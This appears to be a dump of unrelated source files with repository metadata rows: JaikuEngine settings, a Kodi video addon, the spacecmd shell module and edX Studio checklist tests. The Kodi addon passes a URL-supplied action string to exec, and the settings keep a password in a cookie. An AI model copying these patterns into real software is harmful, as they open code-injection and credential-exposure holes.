# This is the domain you intend to serve your site from, when using hosted
# domains. If SSL is enabled for login and join those requests will still
# go to the GAE_DOMAIN above.
HOSTED_DOMAIN = 'example.com'
# App Engine requires you to serve with a subdomain
DEFAULT_HOSTED_SUBDOMAIN = 'www'
NS_DOMAIN = 'example.com'
# DOMAIN will be used wherever a url to this site needs to be created
# NS_DOMAIN will be used as the domain part of actor identifiers.
# Note that changing this once you have deployed the site will likely result
# in catastrophic failure.
if HOSTED_DOMAIN_ENABLED:
DOMAIN = '%s.%s' % (DEFAULT_HOSTED_SUBDOMAIN, HOSTED_DOMAIN)
else:
DOMAIN = GAE_DOMAIN
# Subdomains aren't supported all that nicely by App Engine yet, so you
# probably won't be able to enable WILDCARD_SUBDOMAINS below, but you can
# still set up your app to use some of the static subdomains below.
# Subdomains are ignored unless HOSTED_DOMAIN_ENABLED is True.
SUBDOMAINS_ENABLED = False
WILDCARD_USER_SUBDOMAINS_ENABLED = False
# These are defined as { subdomain : url_conf, ...}
INSTALLED_SUBDOMAINS = {
'api': 'api.urls', # api-only urlconf
'm': 'urls', # default urlconf, but allow the subdomain
}
# Enable SSL support for login and join, if using HOSTED_DOMAIN_ENABLED
# this means you will be redirecting through https://GAE_DOMAIN/login
# and https://GAE_DOMAIN/join for those respective actions.
SSL_LOGIN_ENABLED = False
#
# Appearance / Theme
#
# The default theme to use
DEFAULT_THEME = 'trotz'
#
# Cookie
#
# Cookie settings, pretty self explanatory, you shouldn't need to touch these.
USER_COOKIE = 'user'
PASSWORD_COOKIE = 'password'
COOKIE_DOMAIN = '.%s' % DOMAIN
COOKIE_PATH = '/'
#
# Blog
#
# Do you want /blog to redirect to your blog?
BLOG_ENABLED = False
# Where is your blog?
BLOG_URL = 'http://example.com'
BLOG_FEED_URL = 'http://example.com/feeds'
#
# API
#
# Setting this to True will make the public API accept all requests as being
# from ROOT with no regard to actual authentication.
# Never this set to True on a production site.
API_DISABLE_VERIFICATION = False
# These next three determine which OAuth Signature Methods to allow.
API_ALLOW_RSA_SHA1 = True
API_ALLOW_HMAC_SHA1 = True
API_ALLOW_PLAINTEXT = False
# These three determine whether the ROOT use should be allowed to use these
# methods, if any at all. Setting all of these to False will disable the
# ROOT user from accessing the public API
API_ALLOW_ROOT_RSA_SHA1 = True
API_ALLOW_ROOT_HMAC_SHA1 = True
API_ALLOW_ROOT_PLAINTEXT = False
# OAuth consumer key and secret values
ROOT_TOKEN_KEY = 'ROOT_TOKEN_KEY'
ROOT_TOKEN_SECRET = 'ROOT_TOKEN_SECRET'
ROOT_CONSUMER_KEY = 'ROOT_CONSUMER_KEY'
ROOT_CONSUMER_SECRET = 'ROOT_CONSUMER_SECRET'
# Allow support for legacy API authentication
API_ALLOW_LEGACY_AUTH = False
LEGACY_SECRET_KEY = 'I AM ALSO SECRET'
#
# SMS
#
# Enabling SMS will require a bit more than just making this True, please
# read the docs at http://code.google.com/p/jaikuengine/wiki/sms_support
SMS_ENABLED = False
# Most SMS vendors will provide a service that will post messages to a url
# on your site when an SMS has been received on their end, this setting allows
# you to add a secret value to that must exist in that url to prevent
# malicious use.
SMS_VENDOR_SECRET = 'SMS_VENDOR'
# Valid numbers on which you expect to receive SMS
SMS_TARGET = '00000'
# Whitelist regular expression for allowable mobile-terminated targets
SMS_MT_WHITELIST = re.compile('\+\d+')
# Blacklist regular expression for blocked mobile-terminated targets
SMS_MT_BLACKLIST = None
# Turn on test mode for SMS
SMS_TEST_ONLY = False
# Numbers to use when testing live SMS so you don't spam all your users
SMS_TEST_NUMBERS = []
#
# XMPP / IM
#
# Enabling IM will require a bit more than just making this True, please
# read the docs at http://code.google.com/p/jaikuengine/wiki/im_support
IM_ENABLED = False
# This is the id (JID) of the IM bot that you will use to communicate with
# users of the IM interface
IM_BOT = '[email protected]'
# Turn on test mode for IM
IM_TEST_ONLY = False
# JIDs to allow when testing live XMPP so you don't spam all your users
IM_TEST_JIDS = []
# Enable to send plain text messages only. Default is to send both plain
# text and html.
IM_PLAIN_TEXT_ONLY = False
# Truncate entry title in comments. None or 140+ means no truncation.
IM_MAX_LENGTH_OF_ENTRY_TITLES_FOR_COMMENTS = 40
#
# Task Queue
#
# Enabling the queue will allow you to process posts with larger numbers
# of followers but will require you to set up a cron job that will continuously
# ping a special url to make sure the queue gets processed
QUEUE_ENABLED = True
# The secret to use for your cron job that processes your queue
QUEUE_VENDOR_SECRET = 'SECRET'
#
# Throttling Config
#
# This will control the max number of SMS to send over a 30-day period
THROTTLE_SMS_GLOBAL_MONTH = 10000
# Settings for remote services
IMAGE_UPLOAD_ENABLED = False
IMAGE_UPLOAD_URL = 'upload.example.com'
# Settings for Google Contacts import
GOOGLE_CONTACTS_IMPORT_ENABLED = False
FEEDS_ENABLED = False
MARK_AS_SPAM_ENABLED = True
PRESS_ENABLED = False
HIDE_COMMENTS_ENABLED = True
MULTIADMIN_ENABLED = False
PRIVATE_CHANNELS_ENABLED = False
MARKDOWN_ENABLED = False
# Lists nicks of users participating in conversations underneath comment
# areas for posts. Clicking list items inserts @nicks into comment box.
# The list shows a maximum of 25 nicks.
COMMENT_QUICKLINKS_ENABLED = True
# If enabled, adds support for using access keys 1-9 to insert @nicks into
# comment box. Requires COMMENT_QUICKLINKS_ENABLED.
COMMENT_QUICKLINKS_ACCESSKEYS_ENABLED = False
PROFILE_DB = False
# Limit of avatar photo size in kilobytes
MAX_AVATAR_PHOTO_KB = 200
MAX_ACTIVATIONS = 10
# Email Test mode
EMAIL_TEST_ONLY = False
# Allowed email addresses for testing
EMAIL_TEST_ADDRESSES = []
# Email limiting, if this is set it will restrict users to those with
# email addresses in this domain
EMAIL_LIMIT_DOMAIN = None
# Things to measure to taste
MAX_COMMENT_LENGTH = 2000
# Gdata Stuff
GDATA_CONSUMER_KEY = ''
GDATA_CONSUMER_SECRET = ''
def default_email_sender():
try:
return os.environ['DJANGO_DEFAULT_FROM_EMAIL']
except KeyError:
return '[email protected]'
DEFAULT_FROM_EMAIL = default_email_sender()
DEFAULT_UNITTEST_TO_EMAIL = '[email protected]'
PROFILING_DATA_PATH = 'profiling/prof_db.csv'
# Set up the settings for the dev server if we are running it
if MANAGE_PY:
try:
from dev_settings import *
except ImportError:
pass
# Allow local overrides, useful for testing during development
try:
from local_settings import *
except ImportError:
pass
| apache-2.0 | -9,122,076,332,528,893,000 | 26.925558 | 79 | 0.734672 | false |
listamilton/supermilton.repository | plugin.video.olhardigital/default.py | 1 | 1215 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# http://www.youtube.com/user/moshipery
#------------------------------------------------------------
# Licença: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Baseado no código do addon youtube
#------------------------------------------------------------
import os
import sys
import plugintools
import xbmc,xbmcaddon
from addon.common.addon import Addon
addonID = 'plugin.video.olhardigital'
addon = Addon(addonID, sys.argv)
local = xbmcaddon.Addon(id=addonID)
icon = local.getAddonInfo('icon')
YOUTUBE_CHANNEL_ID = "moshipery"
# Ponto de Entrada
def run():
plugintools.log("olhardigital.run")
# Pega Parâmetros
params = plugintools.get_params()
if params.get("action") is None:
main_list(params)
else:
action = params.get("action")
exec action+"(params)"
plugintools.close_item_list()
# Menu Principal
def main_list(params):
plugintools.log("olhardigital.main_list "+repr(params))
plugintools.add_item(
title = "Canal Olhar Digital",
url = "plugin://plugin.video.youtube/user/"+YOUTUBE_CHANNEL_ID+"/",
thumbnail = icon,
folder = True )
run() | gpl-2.0 | 36,636,912,093,056,300 | 24.808511 | 69 | 0.580033 | false |
renner/spacewalk | spacecmd/src/lib/shell.py | 3 | 7608 | #
# Licensed under the GNU General Public License Version 3
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright 2013 Aron Parsons <[email protected]>
#
# NOTE: the 'self' variable is an instance of SpacewalkShell
# wildcard import
# pylint: disable=W0401,W0614
# unused argument
# pylint: disable=W0613
# invalid function name
# pylint: disable=C0103
# use of exec
# pylint: disable=W0122
import atexit
import logging
import os
import readline
import re
import shlex
import sys
from cmd import Cmd
from spacecmd.utils import *
class UnknownCallException(Exception):
def __init__(self):
Exception.__init__(self)
class SpacewalkShell(Cmd):
__module_list = ['activationkey', 'configchannel', 'cryptokey',
'custominfo', 'distribution', 'errata',
'filepreservation', 'group', 'kickstart',
'misc', 'org', 'package', 'repo', 'report', 'schedule',
'snippet', 'softwarechannel', 'ssm', 'api',
'system', 'user', 'utils', 'scap']
# a SyntaxError is thrown if we don't wrap this in an 'exec'
for module in __module_list:
exec('from spacecmd.%s import *' % module)
# maximum length of history file
HISTORY_LENGTH = 1024
cmdqueue = []
completekey = 'tab'
stdout = sys.stdout
prompt_template = 'spacecmd {SSM:##}> '
current_line = ''
# do nothing on an empty line
emptyline = lambda self: None
def __init__(self, options, conf_dir, config_parser):
Cmd.__init__(self)
self.session = ''
self.current_user = ''
self.server = ''
self.ssm = {}
self.config = {}
self.postcmd(False, '')
# make the options available everywhere
self.options = options
# make the configuration file available everywhere
self.config_parser = config_parser
# this is used when loading and saving caches
self.conf_dir = conf_dir
self.history_file = os.path.join(self.conf_dir, 'history')
try:
# don't split on hyphens or colons during tab completion
newdelims = readline.get_completer_delims()
newdelims = re.sub(':|-|/', '', newdelims)
readline.set_completer_delims(newdelims)
if not options.nohistory:
try:
if os.path.isfile(self.history_file):
readline.read_history_file(self.history_file)
readline.set_history_length(self.HISTORY_LENGTH)
# always write the history file on exit
atexit.register(readline.write_history_file,
self.history_file)
except IOError:
logging.error('Could not read history file')
# pylint: disable=W0702
except:
# pylint: disable=W0702
pass
# handle shell exits and history substitution
def precmd(self, line):
# disable too-many-return-statements warning
# pylint: disable=R0911
# remove leading/trailing whitespace
line = re.sub(r'^\s+|\s+$', '', line)
# don't do anything on empty lines
if line == '':
return ''
# terminate the shell
if re.match('quit|exit|eof', line, re.I):
print()
sys.exit(0)
# don't attempt to login for some commands
if re.match('help|login|logout|whoami|history|clear', line, re.I):
# login required for clear_caches or it fails with:
# "SpacewalkShell instance has no attribute 'system_cache_file'"
if not re.match('clear_caches', line, re.I):
return line
# login before attempting to run a command
if not self.session:
# disable no-member error message
# pylint: disable=E1101
self.do_login('')
if self.session == '':
return ''
parts = shlex.split(line)
if parts:
command = parts[0]
else:
return ''
# print(the help message for a command if the user passed --help)
if '--help' in parts or '-h' in parts:
return 'help %s' % command
# should we look for an item in the history?
if command[0] != '!' or len(command) < 2:
return line
# remove the '!*' line from the history
# disable no-member error message
# pylint: disable=E1101
self.remove_last_history_item()
history_match = False
if command[1] == '!':
# repeat the last command
line = readline.get_history_item(
readline.get_current_history_length())
if line:
history_match = True
else:
logging.warning('%s: event not found', command)
return ''
# attempt to find a numbered history item
if not history_match:
try:
number = int(command[1:])
line = readline.get_history_item(number)
if line:
history_match = True
else:
raise Exception
except IndexError:
pass
except ValueError:
pass
# attempt to match the beginning of the string with a history item
if not history_match:
history_range = range(1, readline.get_current_history_length())
history_range.reverse()
for i in history_range:
item = readline.get_history_item(i)
if re.match(command[1:], item):
line = item
history_match = True
break
# append the arguments to the substituted command
if history_match:
if parts[1:]:
for arg in parts[1:]:
line += " '%s'" % arg
readline.add_history(line)
print(line)
return line
else:
logging.warning('%s: event not found', command)
return ''
@staticmethod
def print_result(cmdresult, cmd):
logging.debug(cmd + ": " + repr(cmdresult))
if cmd:
try:
if type(cmdresult).__name__ == 'str':
print(cmdresult)
else:
for i in cmdresult:
print(i)
except TypeError:
pass
# update the prompt with the SSM size
# pylint: disable=arguments-differ
def postcmd(self, cmdresult, cmd):
SpacewalkShell.print_result(cmdresult, cmd)
self.prompt = re.sub('##', str(len(self.ssm)), self.prompt_template)
def default(self, line):
Cmd.default(self, line)
raise UnknownCallException
| gpl-2.0 | -6,142,400,948,772,226,000 | 30.053061 | 79 | 0.560594 | false |
pomegranited/edx-platform | cms/djangoapps/contentstore/features/checklists.py | 3 | 4725 | # pylint: disable=missing-docstring
# pylint: disable=redefined-outer-name
from lettuce import world, step
from nose.tools import assert_true, assert_equal
from selenium.common.exceptions import StaleElementReferenceException
############### ACTIONS ####################
@step('I select Checklists from the Tools menu$')
def i_select_checklists(step):
world.click_tools()
link_css = 'li.nav-course-tools-checklists a'
world.css_click(link_css)
world.wait_for_ajax_complete()
@step('I have opened Checklists$')
def i_have_opened_checklists(step):
step.given('I have opened a new course in Studio')
step.given('I select Checklists from the Tools menu')
@step('I see the four default edX checklists$')
def i_see_default_checklists(step):
checklists = world.css_find('.checklist-title')
assert_equal(4, len(checklists))
assert_true(checklists[0].text.endswith('Getting Started With Studio'))
assert_true(checklists[1].text.endswith('Draft a Rough Course Outline'))
assert_true(checklists[2].text.endswith("Explore edX\'s Support Tools"))
assert_true(checklists[3].text.endswith('Draft Your Course About Page'))
@step('I can check and uncheck tasks in a checklist$')
def i_can_check_and_uncheck_tasks(step):
# Use the 2nd checklist as a reference
verifyChecklist2Status(0, 7, 0)
toggleTask(1, 0)
verifyChecklist2Status(1, 7, 14)
toggleTask(1, 3)
verifyChecklist2Status(2, 7, 29)
toggleTask(1, 6)
verifyChecklist2Status(3, 7, 43)
toggleTask(1, 3)
verifyChecklist2Status(2, 7, 29)
@step('the tasks are correctly selected$')
def tasks_correctly_selected(step):
verifyChecklist2Status(2, 7, 29)
# verify that task 7 is still selected by toggling its checkbox state and making sure that it deselects
world.browser.execute_script("window.scrollBy(0,1000)")
toggleTask(1, 6)
verifyChecklist2Status(1, 7, 14)
@step('I select a link to the course outline$')
def i_select_a_link_to_the_course_outline(step):
clickActionLink(1, 0, 'Edit Course Outline')
@step('I am brought to the course outline page$')
def i_am_brought_to_course_outline(step):
assert world.is_css_present('body.view-outline')
assert_equal(1, len(world.browser.windows))
@step('I am brought back to the course outline in the correct state$')
def i_am_brought_back_to_course_outline(step):
step.given('I see the four default edX checklists')
# In a previous step, we selected (1, 0) in order to click the 'Edit Course Outline' link.
# Make sure the task is still showing as selected (there was a caching bug with the collection).
verifyChecklist2Status(1, 7, 14)
@step('I select a link to help page$')
def i_select_a_link_to_the_help_page(step):
clickActionLink(2, 0, 'Visit Studio Help')
@step('I am brought to the help page in a new window$')
def i_am_brought_to_help_page_in_new_window(step):
step.given('I see the four default edX checklists')
windows = world.browser.windows
assert_equal(2, len(windows))
world.browser.switch_to_window(windows[1])
assert_equal('http://help.edge.edx.org/', world.browser.url)
############### HELPER METHODS ####################
def verifyChecklist2Status(completed, total, percentage):
def verify_count(driver):
try:
statusCount = world.css_find('#course-checklist1 .status-count').first
return statusCount.text == str(completed)
except StaleElementReferenceException:
return False
world.wait_for(verify_count)
assert_equal(str(total), world.css_find('#course-checklist1 .status-amount').first.text)
# Would like to check the CSS width, but not sure how to do that.
assert_equal(str(percentage), world.css_find('#course-checklist1 .viz-checklist-status-value .int').first.text)
def toggleTask(checklist, task):
world.css_click('#course-checklist' + str(checklist) + '-task' + str(task))
world.wait_for_ajax_complete()
# TODO: figure out a way to do this in phantom and firefox
# For now we will mark the scenerios that use this method as skipped
def clickActionLink(checklist, task, actionText):
# text will be empty initially, wait for it to populate
def verify_action_link_text(driver):
actualText = world.css_text('#course-checklist' + str(checklist) + ' a', index=task)
if actualText == actionText:
return True
else:
# toggle checklist item to make sure that the link button is showing
toggleTask(checklist, task)
return False
world.wait_for(verify_action_link_text)
world.css_click('#course-checklist' + str(checklist) + ' a', index=task)
world.wait_for_ajax_complete()
| agpl-3.0 | 3,535,864,958,596,505,600 | 36.8 | 115 | 0.695661 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.